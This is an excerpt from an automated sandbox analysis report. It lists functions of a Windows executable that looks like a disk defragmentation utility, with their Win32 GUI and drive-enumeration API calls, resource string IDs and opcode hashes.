                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5aefa7627db053bc19ce836ee675852e1581c0d2c6d0c383a558c045f8e90c7a
                                                                                                                                                                                                                                                                                                • Instruction ID: 0d35042033ab4bcba5b5504f1679565f5a42da054b4ba6bdd24cf5a76d4ef131
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5aefa7627db053bc19ce836ee675852e1581c0d2c6d0c383a558c045f8e90c7a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D41C0B1E18A188AF7248A24DD44BEB7336EF94310F0041FAD50D9B681DA7D5FD2CB56
                                                                                                                                                                                                                                                                                                Function 0043430E Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 70d014d65552d08ad7cd422562661d9099514aa5f296e359a8a4409b7059de46
                                                                                                                                                                                                                                                                                                • Instruction ID: fd6bbcd556357d9eeb051eeb42d7f6bccc5d62fccbdccfe49c3443563a2f1b6c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70d014d65552d08ad7cd422562661d9099514aa5f296e359a8a4409b7059de46
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9841B6B2D042155BEB28CB28DD56AFABB79EB94304F0481FFD40D66684D7385F818E41
                                                                                                                                                                                                                                                                                                Function 00468F80 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d6eb95aebdd0832f893845c2801e487cae1a373ae23844e6cf616ad7b7813bce
                                                                                                                                                                                                                                                                                                • Instruction ID: 25f691dd9f4b04871031b08211d0b3aff43497b52775273811143d25c2d92c00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6eb95aebdd0832f893845c2801e487cae1a373ae23844e6cf616ad7b7813bce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0211C933769A1007E76C843C58523AB418743E5738F298B2FA936C63E8E97DCD42515E
                                                                                                                                                                                                                                                                                                Function 00402140 Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75A7AF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                                • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                                • API String ID: 3599163918-2734650818
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                                Function 00428720 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                                • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                                • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                                • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                                Function 004164C0 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                                • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                                • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                                • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                                • String ID: 4$COMBOBOX
                                                                                                                                                                                                                                                                                                • API String ID: 3327461832-2064896087
                                                                                                                                                                                                                                                                                                • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                                Function 00432180 Relevance: 28.3, APIs: 4, Strings: 12, Instructions: 303windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2611688555
